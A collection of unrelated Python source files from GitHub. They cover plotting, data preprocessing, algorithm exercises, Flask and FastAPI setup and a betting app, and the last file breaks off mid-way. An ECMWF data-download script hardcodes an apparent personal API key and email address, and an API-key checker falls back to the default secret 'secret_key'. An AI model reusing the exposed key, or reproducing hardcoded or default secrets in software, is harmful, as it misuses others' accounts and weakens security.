{'fontname':'Arial'}\nsize_suptitlefig = 35\nsize_title_fig = 30\nsize_scenario_text = 27\nsize_subplots_letters = 40\nsize_title_axes = 28\nsize_line_plot_legend = 16\nsize_lat_lon_coords = 23\nsize_colorbar_labels = 30\nsize_colorbar_ticks = 26\n\nfor scenario_idx, scenario_short in enumerate(short_scenarios_list):\n scenario = f'SSP{scenario_short[-3]}-{scenario_short[-2]}.{scenario_short[-1]}'\n\n min_value = np.concatenate((prediction_warming[scenario_idx,:,:], simulation_warming[scenario_idx,:,:])).min()\n max_value = np.concatenate((prediction_warming[scenario_idx,:,:], simulation_warming[scenario_idx,:,:])).max()\n\n max_abs_value = np.max([abs(min_value), abs(max_value)])\n levels = np.linspace(min_value, max_value, 40)\n\n if scenario_idx == 0:\n cbarticks = np.arange(-2,12,2)\n elif scenario_idx == 1:\n cbarticks = np.arange(-2,16,2)\n elif scenario_idx == 2:\n cbarticks = np.arange(-2,18,2)\n\n fig = plt.figure(constrained_layout=True, figsize=(30,10))\n ax = fig.add_gridspec(3,11)\n\n \"\"\" ax1 \"\"\"\n ax1 = fig.add_subplot(ax[1:, :5], projection=ccrs.Robinson())\n\n data_1 = prediction_warming[scenario_idx]\n data_cyclic_1, lons_cyclic_1 = add_cyclic_point(data_1, lons)\n cs1=ax1.contourf(lons_cyclic_1, lats, data_cyclic_1,\n vmin=-max_abs_value, vmax=max_abs_value, levels=levels, \n transform = ccrs.PlateCarree(),cmap='bwr')#, extend='both')\n ax1.coastlines()\n gl1 = ax1.gridlines(draw_labels=True, linestyle='--', color='black', linewidth=0.1)\n gl1.top_labels = False\n gl1.right_labels = False\n gl1.xlabel_style = {'size': size_lat_lon_coords, 'color': 'black', 'weight': 'normal', 'font':'Arial'}\n gl1.ylabel_style = {'size': size_lat_lon_coords, 'color': 'black', 'weight': 'normal', 'font':'Arial'}\n ax1.set_title(f'Deep Neural Networks ensemble', size=size_title_axes, pad=17, **font)\n\n cbar1 = plt.colorbar(cs1,shrink=0.7, ticks=cbarticks, orientation='horizontal', label='Surface Air Temperature anomaly [°C]') #,label='Temperature warming')\n cbar1.set_label(label='Surface Air Temperature anomaly [°C]', size=size_colorbar_labels, labelpad=20, family='Arial')\n for l in cbar1.ax.xaxis.get_ticklabels():\n l.set_family('Arial')\n l.set_size(size_colorbar_ticks)\n\n \"\"\" ax2 \"\"\"\n ax2 = fig.add_subplot(ax[1:, 5])\n\n ax2.plot(predictions_means_over_lons[scenario_idx], lats, label='DNN')\n ax2.plot(simulations_means_over_lons[scenario_idx], lats, label='CMIP6')\n ax2.set_ylim(bottom=0, top=0)\n plt.yticks([-90,-60,-30,0,30,60,90], ['90°S','60°S', '30°S', '0', '30°N', '60°N', '90°N'], fontname='Arial', fontsize=size_lat_lon_coords) # Set text labels.\n plt.xticks(fontname='Arial', fontsize=size_lat_lon_coords) # Set text labels.\n ax2.tick_params(axis='both', which='major', labelsize=size_lat_lon_coords)\n ax2.legend(loc='lower right', prop={'size': size_line_plot_legend, 'family':'Arial'})\n\n \"\"\" ax3 \"\"\"\n ax3 = fig.add_subplot(ax[1:, 6:], projection=ccrs.Robinson())\n data_3 = simulation_warming[scenario_idx]\n data_cyclic_3, lons_cyclic_3 = add_cyclic_point(data_3, lons)\n cs3=ax3.contourf(lons_cyclic_3, lats, data_cyclic_3,\n vmin=-max_abs_value, vmax=max_abs_value, levels=levels,\n transform = ccrs.PlateCarree(),cmap='bwr')#, extend='both')\n ax3.coastlines()\n gl3 = ax3.gridlines(draw_labels=True, linestyle='--', color='black', linewidth=0.1)\n gl3.top_labels = False\n gl3.right_labels = False\n gl3.xlabel_style = {'size': size_lat_lon_coords, 'color': 'black', 'weight': 'normal', 'family':'Arial'}\n gl3.ylabel_style = {'size': size_lat_lon_coords, 'color': 'black', 'weight': 'normal', 'family':'Arial'}\n ax3.set_title(f'CMIP6 ensemble', size=size_title_axes, pad=17, **font)\n cbar3 = plt.colorbar(cs3,shrink=0.7,ticks=cbarticks,orientation='horizontal')# ,label='Temperature warming')\n cbar3.set_label(label='Surface Air Temperature anomaly [°C]', size=size_colorbar_labels, labelpad=20, family='Arial')\n for l in cbar3.ax.xaxis.get_ticklabels():\n l.set_family('Arial')\n l.set_size(size_colorbar_ticks)\n\n plt.draw()\n for ea in gl1.ylabel_artists:\n right_label = ea.get_position()[0] > 0\n if right_label:\n ea.set_visible(False)\n for ea in gl3.ylabel_artists:\n right_label = ea.get_position()[0] > 0\n if right_label:\n ea.set_visible(False)\n\n fig.suptitle(f'{scenario}', y=0.85, size=size_suptitlefig, **font)\n plt.savefig(f'Ext_Fig_1_{scenario_short}.png', bbox_inches = 'tight', dpi=300)\n plt.close()","repo_name":"francescoimmorlano/paper-review","sub_path":"Figures/Ext_Fig_1.py","file_name":"Ext_Fig_1.py","file_ext":"py","file_size_in_byte":12142,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"36021679638","text":"import os\n\nfrom tqdm import tqdm\n\nfrom conversation import Conversation\n\npath = \"data/memo-corpus/vtt\"\nfor file in os.listdir(path):\n if \"group12\" in file:\n continue\n\n filepath = os.path.join(path, file)\n conv = Conversation(filepath)\n conv.load(compute_embeddings=False)\n conv.export_tsv(\"data/memo-corpus/tsv/sessions\" + file[:-4] + \".tsv\")\n\n\n# for i in range(1,16):\n\n\n# all_lines = []\n# for file in tqdm(os.listdir(\"tsvs/\")):\n# transcript_file = open(\"tsvs/\" + file, \"r\")\n# lines = transcript_file.readlines()\n# transcript_file.close()\n# all_lines.extend(lines)\n#\n# with open(\"memo-may16.tsv\", \"w\") as f:\n# f.writelines(all_lines)\n#\n","repo_name":"danieldeweerd/rp-meetingmastery","sub_path":"preprocessing/merge_all_data.py","file_name":"merge_all_data.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"18113588364","text":"# coding:utf-8\n\n# 二分要求列表有序,返回的是元素的索引\n# 二分查找是不断查找中间位置的值和要查找的值做比较,\n# 不断调整猜测地范围来调整中间值\n# 复杂度 O(logn)\n\ndef binary_search(list, item):\n low = 0\n high = len(list) - 1\n # low和high表明查找范围\n\n while low <= high:\n # 只要范围没有缩小到只包含一个元素\n mid = (low+high)/2 # 中间位置\n guess = list[mid] # 猜测的元素\n if guess == item:\n return mid\n if guess > item:\n high = mid - 1\n else:\n low = mid + 1\n return None\n\n\nprint (binary_search([1,2,3,8,9,10],2))\n\n","repo_name":"fank-cd/books_exercise_code","sub_path":"Grokking Algorithms/Chapter 1 binary_search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"22028138281","text":"\"\"\"\nMicroservice module\n\nThis module contains the microservice code for\n server\n models\n\"\"\"\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\n# Create the Flask aoo\napp = Flask(__name__)\napp.config.from_object('config')\n\ndb = SQLAlchemy(app)\n\nfrom app import server, models\nfrom flasgger import Swagger\n\napp.config['SWAGGER'] = {\n \"swagger_version\": \"2.0\",\n \"specs\": [\n {\n \"version\": \"1.0.0\",\n \"title\": \"Shopcarts REST API Service\",\n \"description\":\"This is the Shopcart API\",\n \"endpoint\": 'v1_spec',\n \"route\": '/v1/spec',\n \"basePath\": '/'\n }\n ],\n}\n\n# Initialize Swagger after configuring it\nSwagger(app)\n","repo_name":"radhikamattoo/shopcarts","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"41787525166","text":"from class_connectivity import connectivity\n\nconn = connectivity('7', 1.25)\n# name of atom, cutoff value\n\nconn.loadfile('step72M.lammpstrj')\n# input file\n\nconn.findcluster()\n\nconn.caldistro('clustersize.out')\n# output file\n\n# output of atoms to file is not completed\n# need to decide what kind of format\n# may use lammpstrj as the format, or the pdb\n# to check the clusters, run this script in the interactive mode.\n# data is in conn.clusters\n","repo_name":"fill-10/RDFConn","sub_path":"calConn.py","file_name":"calConn.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"72582428484","text":"\"\"\"System module.\"\"\"\nfrom fastapi import Security\nfrom fastapi.security import APIKeyHeader, APIKeyQuery\nfrom starlette.exceptions import HTTPException\nfrom starlette.status import HTTP_403_FORBIDDEN\nfrom decouple import config\n\nAPI_KEY_NAME = \"api-key\"\napi_key_query = APIKeyQuery(\n name=API_KEY_NAME, scheme_name=\"API key query\", auto_error=False\n)\napi_key_header = APIKeyHeader(\n name=API_KEY_NAME, scheme_name=\"API key header\", auto_error=False\n)\n\n\ndef check_key(key: str):\n \"\"\"\n Check key\n \"\"\"\n return key == config(\"API_KEY_SECRET\", default=\"secret_key\", cast=str)\n\n\ndef verify_api_key(\n query_param: str = Security(api_key_query),\n header_param: str = Security(api_key_header),\n):\n \"\"\"\n Verify\n \"\"\"\n if config(\"USE_API_KEY\", default=True, cast=bool):\n if not query_param and not header_param:\n raise HTTPException(\n status_code=HTTP_403_FORBIDDEN,\n detail=\"An API key must be passed as query or header\",\n )\n\n if query_param and check_key(query_param):\n return query_param\n\n if header_param and check_key(header_param):\n return header_param\n\n raise HTTPException(status_code=HTTP_403_FORBIDDEN, detail=\"Invalid API key.\")\n # API key verification disabled\n return None\n","repo_name":"marrem96/macke","sub_path":"core/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"26373429776","text":"from .models import MatchRegistration,MatchResult,User,Bet,Ranking,RegisterBet\nfrom django.db.models import F\nfrom .messages import Messages\n\n\nclass Aposta:\n cred = None\n id = None\n\n matchRegistration= MatchRegistration.objects.all()\n userCredito = None\n matchID = None\n\n users = User.objects.all()\n ranking = Ranking.objects.all()\n ordered = users.order_by('-credits')\n registerBet = RegisterBet.objects.all()\n\n\n def __init__(self,cred,id):\n self.cred = cred\n self.id = id\n self.userCredito = User.objects.get(login =self.cred)\n self.matchID = MatchRegistration.objects.get(id =self.id)\n\n\n\n def apostarRefresh(self):\n\n for match in self.matchRegistration:\n try:\n MatchResult.objects.get(game = match)\n except MatchResult.DoesNotExist:\n register = RegisterBet(id = match.id,homeTeam = match.homeTeam,visitorTeam = match.visitorTeam,date = match.date,hora = match.hora,game = match)\n register.save()\n count = 1\n for userRnk in self.ordered:\n try:\n Ranking.objects.get(user = userRnk)\n except Ranking.DoesNotExist:\n rank = Ranking(user = userRnk,position = count)\n rank.save()\n self.ranking.order_by('-user.credits')\n count = count +1","repo_name":"rafabispo93/TrabalhoP.Web","sub_path":"BetSoccer/bolao/aposta.py","file_name":"aposta.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"72155458246","text":"import math\n\ndef squareRoot(n):\n for j in range(0,n+2):\n sum = 0\n for i in range(1,j+1):\n sum += (2*i-1)\n if sum > n:\n return j-1\n return 0\n\n\nfor i in range(0,100):\n if squareRoot(i) != math.floor(math.sqrt(i)):\n print(\"number: \", i, \"\\tsquareRoot: \", squareRoot(i), \"\\tmath: \", math.floor(math.sqrt(i)))","repo_name":"lukdz/KursPython","sub_path":"3lista/2zad.py","file_name":"2zad.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"26540567505","text":"from rest_framework import (\n status,\n generics\n)\nfrom rest_framework.response import Response\n\nfrom shark_core.permissions import (\n PERM_IS_AUTHENTICATED,\n PERM_ALLOW_ANY\n)\n\nfrom .models import Group, Item, History\nfrom .serializers import (\n ItemSerializer,\n OfferSerializer\n)\nfrom .bonuses import bonus_factory\n\n\nclass ItemListView(generics.ListAPIView):\n \"\"\"\n Widok przedmiotow dostepnych do zakupu\n \"\"\"\n queryset = Item.objects.all()\n permission_classes = (PERM_ALLOW_ANY,)\n serializer_class = ItemSerializer\n\n @staticmethod\n def format_queryset(queryset):\n \"\"\"\n Dodajemy do queryset dodatkowe pola stworzone w danym bonusie\n \"\"\"\n new_queryset = []\n\n # Iterujemy po bonusach\n for bonus in queryset:\n # Pobieramy klase bonusu\n bonus_class = bonus_factory.get_bonus(bonus.group.tag)\n # Tworzymy instancje bomusu\n bonus_instance = bonus_class(bonus)\n # Przypisujemy do bonusu dodatwkoe pola\n bonus.fields = bonus_instance.get_fields()\n # Dodajemy do listy\n new_queryset.append(bonus)\n return new_queryset\n\n def list(self, request, *args, **kwargs):\n queryset = self.filter_queryset(self.get_queryset())\n # Formatujemy queryset\n formatted_queryset = self.format_queryset(queryset)\n page = self.paginate_queryset(formatted_queryset)\n if page is not None:\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n\n serializer = self.get_serializer(formatted_queryset, many=True)\n return Response(serializer.data)\n\n\nitem_list = ItemListView.as_view()\n\n\nclass OfferCreateView(generics.CreateAPIView):\n \"\"\"\n Widok tworzeniania oferty\n \"\"\"\n permission_classes = (PERM_IS_AUTHENTICATED,)\n serializer_class = OfferSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n item = serializer.validated_data['item']\n bonus_class = bonus_factory.get_bonus(item.group.tag)\n bonus_instance = bonus_class(item)\n bonus_instance.after_bought(user=request.user,\n extra_fields=serializer.validated_data.get('extra_fields', None))\n\n serializer.save(user=request.user)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\noffer_create = OfferCreateView.as_view()\n","repo_name":"Qwizi/shark-core","sub_path":"backend/store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"17098444309","text":"#!/usr/bin/env python2\n\nimport rospy\nfrom geometry_msgs.msg import PolygonStamped, Point32\nimport numpy as np\n\nlab_safe_area = np.array([[0,0],\n [0,1],\n [0.7,1],\n [0.7,6.2],\n [1.1,6.2],\n [1.1,3.8],\n [1.7,3.8],\n [1.7,0],\n [8,0],\n [1.7,0],\n [1.7,-1],\n [1.4,-1],\n [1.4,-4.7],\n [-1,-4.7],\n [-1,-3],\n [0,-3],\n [0,0]])\n\ndef visualize_lab_area():\n rospy.init_node('Lab_Polygon_Node', anonymous=True)\n lab_area_pub = rospy.Publisher(\"/lab_area\", PolygonStamped, queue_size=5)\n \n lab_area_msg = PolygonStamped()\n lab_area_msg.header.frame_id = 'world'\n\n for point in lab_safe_area:\n point_msg = Point32()\n point_msg.x = point[0]\n point_msg.y = point[1]\n lab_area_msg.polygon.points.append(point_msg)\n\n node_timer = rospy.Rate(1)\n while not rospy.is_shutdown():\n lab_area_pub.publish(lab_area_msg)\n node_timer.sleep()\n \n\n\nif __name__ == '__main__':\n try:\n visualize_lab_area()\n except rospy.ROSInterruptException:\n pass\n \n","repo_name":"harry5081/donkey_project","sub_path":"src/donkey_mecanum_description/scripts/lab_area_poly.py","file_name":"lab_area_poly.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7365556179","text":"import random\n# pre-define the magic number as constant\n# the list start from one which is also the step for iteration\nstart = step = 1\n# the firstelement of a string is starting from 0\nfirst_element = first_step = 0\n# the fixed probability to randomize num of levels\nfixed_probability = 0.5\n\n\nclass Node():\n '''The regular node that takes a data and connect with the next node in\n linked list.\n '''\n\n def __init__(self, data, next_node=None):\n '''(Node, obj, Node) -> Nonetype\n It initiates this class by adding its data and the node connected next.\n The next node is defualt as None.\n '''\n self.data = data\n self.next_node = next_node\n\n def __str__(self):\n '''(Node) -> str\n It returns the data of the Node unless it is a head node.\n '''\n # see first whether the data is negative inf. If so, return the str\n # Head\n if self.data == -float('inf'):\n return 'Head'\n # or return the data\n return str(self.data)\n\n\nclass Ref_Node(Node):\n '''The Node that can reference to the node with the same value in the lower\n layer. As well, it connects to its next node like a regular Node because it\n is inherited from the Node.\n '''\n\n def __init__(self, data, next_node=None, refer_node=None):\n '''(Ref_Node, obj, [Ref_Node, Node]) -> Nonetype\n This intialize the Ref_Node and leave the data and next_node to the\n factors it has inherited from Node. The refer_node is the new unique\n function of this class.\n '''\n # Implement with its parent class Node\n Node.__init__(self, data, next_node)\n # add value to its refer_Node function\n self.refer_node = refer_node\n\n def __str__(self):\n '''(Ref_Node) -> str\n Return the data in the Ref_Node.\n '''\n return str(self.data)\n\n\nclass Start_Node(Ref_Node):\n '''The node at the start with a negative infinite sign. It inherits from\n the Ref_Node\n '''\n def __init__(self):\n '''(Start_Node) -> Nonetype\n Initialize the Start_Node with implementing Ref_Node\n '''\n Ref_Node.__init__(self, -float('inf'))\n\n def __str__(str):\n '''(Start_Node) -> str\n Return the str Head\n '''\n return 'Head'\n\n\nclass End_Node(Ref_Node):\n '''The node at the end only with an infinite sign, inheriting from Node.\n '''\n def __init__(self):\n '''(End_Node) -> Nonetype\n Intialize the End_Node by implementing the functions in Node. Plus the\n data parameter is specified to be positive infinite.\n '''\n Ref_Node.__init__(self, float('inf'))\n\n def __str__(self):\n '''(End_Node) -> str\n Return str Tail.\n '''\n return 'Tail'\n\n\nclass SkipList():\n '''This is a data structure that ease the search of an element in the\n middle. It may have multiple levels with some elements from the linked list\n in the first level being skiped. This can quicken the search machanism when\n an element far after the head required to be sought.\n '''\n def __init__(self, probability=fixed_probability):\n '''(self, [int]) -> Nonetype\n Intiate the skip list with the fixed probability.\n '''\n # set the head of the first level to be an empty Start_Node\n self.head = Start_Node()\n # set the tail of the first level to be an empty End_Node\n self.tail = End_Node()\n # connect self.head and self.tail since they don't have element in\n # between\n self.head.next_node = self.tail\n # The height of the Skip list\n self.level = start\n # the head of the top level is self.head because it just has one level\n self.top_head = self.head\n # the tail of the top level is self.tail because it just has one level\n self.top_tail = self.tail\n # the probability is always the fixed_probability\n self.probability = probability\n self.length = first_element\n\n def __str__(self):\n '''(SkipList) -> str\n Return the content of the skiplist in the required form\n '''\n # define a return_value and initiate it to be 0\n return_value = ''\n # start to add the element from the self.top_head\n head_node = self.top_head\n # iterate through the first column that contains only Start_Node\n while head_node is not None:\n # set the first node to be the head node and iterate in each row\n node = head_node\n return_value += 'Head->'\n while node.next_node is not None:\n node = node.next_node\n # add the element before the tail\n if node.data != float('inf'):\n return_value = return_value + str(node.data) + '->'\n else:\n # add tail when it reaches the last one\n return_value += 'Tail'\n # change line when it is not in the last row\n if head_node.refer_node is not None:\n return_value += '\\n'\n # go to the next row\n head_node = head_node.refer_node\n # return the value it needs to print\n return return_value\n\n def type_converter(self, node):\n '''(SkipList, Node/Ref_Node) -> obj\n It converts the type of the data when the data of different types need\n to be compared.\n '''\n # test whether the data is str\n if type(node.data) == str:\n # if so see its length, if its length is one, convert itself to the\n # type required\n if len(node.data) == start:\n # take the order of the alphabet\n if node.data.isalpha():\n return ord(node.data)\n else:\n return float(node.data)\n else:\n # then see if the data with long length is convertible to\n # float for the comparison. If not, take the first character of\n # then convert it to float\n contain_nondecimal = False\n for element in node.data:\n decimal_point = first_step\n if not element.isnumeric():\n if element == '.':\n decimal_point += 1\n else:\n contain_nondecimal = True\n if decimal_point > start:\n contain_nondecimal = True\n if contain_nondecimal:\n if node.data[first_element].isalpha():\n return ord(node.data[first_element])\n else:\n return float(node.data[first_element])\n else:\n return float(node.data)\n else:\n # or remain unchanged\n return node.data\n\n def insert_LinkedList(self, new_node, node=None):\n '''(SkipList, Node/Ref_Node, [Start_Node]) -> Nonetype\n Add the element to its right position based on its magnitude\n '''\n if node is None:\n node = self.head\n while node.next_node is not None:\n if type(new_node.data) == type(node.next_node.data):\n new_node_data = new_node.data\n next_node_data = node.next_node.data\n else:\n new_node_data = self.type_converter(new_node)\n next_node_data = self.type_converter(node.next_node)\n if next_node_data >= new_node_data:\n tmp = node.next_node\n node.next_node = new_node\n new_node.next_node = tmp\n return\n node = node.next_node\n\n def add_to_level(self, new_obj, level, bottom_node=None):\n new_node = Node(new_obj)\n if level == start:\n # add the new_node into the first level, the linked list\n self.insert_LinkedList(new_node)\n else:\n node_head = self.top_head\n for index in range(self.level - level):\n node_head = node_head.refer_node\n bottom_node = self.add_to_level(new_obj, level - 1)\n new_node = Ref_Node(new_obj)\n self.insert_LinkedList(new_node, node_head)\n new_node.refer_node = bottom_node\n return new_node\n\n def create_level(self, new_obj, level, bottom_node):\n '''\n When the level does not exist at first, create the levels and add the\n node into the level\n '''\n # define the top head\n new_head = Start_Node()\n new_head.refer_node = self.top_head\n self.top_head = new_head\n # define the new_node\n new_node = Ref_Node(new_obj)\n # add the head and the tail to it\n self.top_head.next_node = new_node\n # if the level is the first\n if level == start:\n # refer itself to the bottom_node\n new_node.refer_node = bottom_node\n else:\n # get the node which should be the bottom node in this case\n node = self.create_level(new_obj, level - step, bottom_node)\n # refer the new_node to the bottom node in this case\n new_node.refer_node = node\n new_tail = End_Node()\n new_node.next_node = new_tail\n new_tail.refer_node = self.top_tail\n self.top_tail = new_tail\n return new_node\n\n def level_generator(self):\n '''(SkipList) -> int\n Return the number of level it generated\n '''\n # initiate the number of level at 0\n level = 1\n # if the number generated by the random is smaller than the probability\n # the number of level will increase by each unit of step\n while random.uniform(0, 1) < self.probability:\n level += step\n # return the level\n return level\n\n def insert(self, new_obj):\n '''(SkipList, obj) -> Nonetype\n '''\n if self.level == 0:\n self.__init__()\n # generate the levels the number should be added\n level = self.level_generator()\n # just add the obj to the levels it's supposed to go to\n if level <= self.level:\n self.add_to_level(new_obj, level)\n else:\n # if its level surpassed the level of the skiplist, add to existing\n # level and create new ones\n new_node = self.add_to_level(new_obj, self.level)\n self.create_level(new_obj, (level - self.level), new_node)\n self.level = level\n self.length += 1\n\n def remove_level(self):\n while type(self.top_head.next_node) == End_Node:\n self.top_head = self.top_head.refer_node\n self.top_tail = self.top_tail.refer_node\n self.level -= step\n if self.top_head is None:\n return\n\n def remove(self, obj):\n head_node = self.top_head\n while head_node is not None:\n node = head_node\n while node is not None:\n if node.next_node is not None:\n if node.next_node.data == obj:\n target_node = node.next_node\n while target_node.data == obj:\n if type(target_node) == Node:\n self.length -= 1\n target_node = target_node.next_node\n node.next_node = target_node\n node = node.next_node\n head_node = head_node.refer_node\n self.remove_level()\n\n def search(self, new_obj):\n '''(SkipList, obj) -> obj\n It can find whether the obj is contained in the skiplist. If it does,\n return the node. Or it should return None.\n '''\n head = self.top_head\n while head is not None:\n node = head\n while node is not None:\n if node.data == new_obj:\n while type(node) == Ref_Node:\n node = node.refer_node\n return node\n node = node.next_node\n head = head.refer_node\n return\n","repo_name":"Gaotao22/CSCA08-48","sub_path":"skiplist.py","file_name":"skiplist.py","file_ext":"py","file_size_in_byte":12190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"541383946","text":"import json\n\nwith open(\"faturamentoEstados.json\") as dados:\n faturamentoEstados = json.load(dados)\n\n\nfaturamentoTotal = 0\nfor faturamento in faturamentoEstados:\n faturamentoTotal += faturamento['valor']\n\na = 0\nfor faturamento in faturamentoEstados:\n porcentagemFaturamento = (faturamento['valor']*100) / faturamentoTotal\n print(\"{0}:{1}%\".format(faturamento['estado'], round(porcentagemFaturamento, 2)))\n\n","repo_name":"igorspatricio/TargetSistemasTeste","sub_path":"ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38563751201","text":"T = int(input())\nfor test_case in range(1, T + 1):\n N, D = map(int, input().split())\n area = 1 + 2 * D\n check = 0\n count = 0\n \n while N > check:\n check += area\n count += 1\n \n print(f'#{test_case} {count}')","repo_name":"jaemoon99/CodingTest","sub_path":"SWEA/D3/14178. 1차원 정원/1차원 정원.py","file_name":"1차원 정원.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7503020597","text":"# EE 140 course at San José State University (SJSU)\n# CLI program to compute values for transmission line theory\n# This program computes values for VSWR, ρ, RL\n# https://github.com/BradleyHo\n\nimport math\n\n# This function computes ρ from VSWR\ndef rcvswr(x):\n y = (x-1)/(x+1) # ρ\n return y\n \n# This function computes RL from VSWR\ndef rlvswr(x):\n z = -20*math.log(rcvswr(x),10) if rcvswr(x) != 0 else \"∞\" # RL\n return z\n\n# This function computes VSWR from ρ\ndef vswrrc(y):\n x = (1+y)/(1-y) if y != 1 else \"∞\" # VSWR\n return x\n \n# This function computes RL from ρ\ndef rlrc(y):\n z = -20*math.log(y,10) if y != 0 else \"∞\" # RL\n if z == 0:\n z = 0.0\n return z\n\n# This function computes ρ from RL\ndef rcrl(z):\n y = math.pow(10, -z/20) # ρ\n return y\n\n# This function computes VSWR from RL\ndef vswrrl(z):\n x = (1+rcrl(z))/(1-rcrl(z)) if z != 0 else \"∞\" # VSWR\n return x\n\n# Tell the user our menu options\nprint(\"Select a given parameter below to solve for the two others:\")\nprint(\"1. Voltage standing wave ratio - VSWR\")\nprint(\"2. Reflection coefficient - ρ = |Γ|\")\nprint(\"3. Return loss - RL (dB)\")\nprint(\"___________________________________________________________\")\n\nwhile True:\n # Take the input choice from the user\n choice = input(\"Enter choice (1/2/3):\")\n\n # Check if the choice is valid: 1 of the 3 options\n if choice in ('1', '2', '3'):\n num1 = float(input(\"Enter the value for chosen parameter:\"))\n\n # 1 input: VSWR\n # 2 outputs: ρ, RL\n if choice == '1':\n print(\"Given: VSWR =\", num1)\n print(\"ρ =\", rcvswr(num1))\n print(\"RL =\", rlvswr(num1), \"dB\")\n\n # 1 input: ρ\n # 2 outputs: VSWR, RL\n elif choice == '2':\n print(\"VSWR =\", vswrrc(num1))\n print(\"Given: ρ =\", num1)\n print(\"RL =\", rlrc(num1), \"dB\")\n\n # 1 input: RL\n # 2 outputs: VSWR, ρ\n elif choice == '3':\n print(\"VSWR =\", vswrrl(num1))\n print(\"ρ =\", rcrl(num1))\n print(\"Given: RL =\", num1, \"dB\")\n \n # Check if the user wants another calculation\n # Repeatedly ask the user to enter a valid option yes or no (y/n) if input does not match \n # Break the while loop if answer is n\n # Otherwise, the default is y to continue the next calculation\n next_calculation = input(\"Perform another calculation? (y/n):\")\n while next_calculation.lower() not in (\"y\",\"n\"):\n next_calculation = input(\"Invalid input. Enter choice (y/n): \")\n if next_calculation == \"n\":\n print(\"I hope it was useful. Good luck in EE 140!\")\n break\n # Within the main while loop, accept either 1 of the 3 choices from the user if it is valid\n # Otherwise, repeatedly ask the user to input 1 or 2 or 3 (1/2/3) if the input does not match\n else:\n print(\"Invalid input. Enter (1/2/3):\")","repo_name":"BradleyHo/ee140","sub_path":"transmission-line-calculator.py","file_name":"transmission-line-calculator.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27900370617","text":"\"\"\"added file url field for a file attachment\n\nRevision ID: db979b4a69f7\nRevises: dc6a15385526\nCreate Date: 2022-04-28 12:56:04.398328\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'db979b4a69f7'\ndown_revision = 'dc6a15385526'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('project_review_records', sa.Column('file_url', sa.Text(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('project_review_records', 'file_url')\n # ### end Alembic commands ###\n","repo_name":"likit/stin-research-is","sub_path":"erm/migrations/versions/db979b4a69f7_added_file_url_field_for_a_file_.py","file_name":"db979b4a69f7_added_file_url_field_for_a_file_.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"21019487810","text":"from sys import stdin\nMAX = int(1e9)\nn = int(stdin.readline())\ndata = [0] * 1000001\ndata[0] = MAX\ndata[1] = 0\ndata[2] = 1\n\ncnt = 0\nfor i in range(2,n+1) :\n if i%3==0 :\n save1 = i//3\n else :\n save1 = 0\n\n if i%2==0 :\n save2 = i//2\n else :\n save2 = 0\n\n data[i] = min(data[save1],data[save2],data[i-1]) + 1\n \nprint(data[n])","repo_name":"kim-jinseop/CodingTest","sub_path":"백준/Silver/1463. 1로 만들기/1로 만들기.py","file_name":"1로 만들기.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39801549278","text":"#!/usr/bin/env python\nimport os\nfrom ecmwfapi import ECMWFDataServer\n\n\n\"\"\"\nAPI for downloading ERA-iterim data from ecmwf servers \n\"\"\"\n\n# data request params\nserver = ECMWFDataServer(url=\"https://api.ecmwf.int/v1\",key=\"dd2d771484943ef8d9092a9607855a00\",email=\"evbecker@ucla.edu\")\nvar_name = 'precip'\nstart_year=2009\nend_year=2019\n\nfor year in range(start_year, end_year):\n print(f'YEAR IS: {year}')\n if var_name == 'precip':\n # configured to retrieve precipitation totals\n server.retrieve({\n \"class\": \"ei\",\n \"dataset\": \"interim\",\n \"date\": f'{year}-01-01/to/{year}-12-31',\n 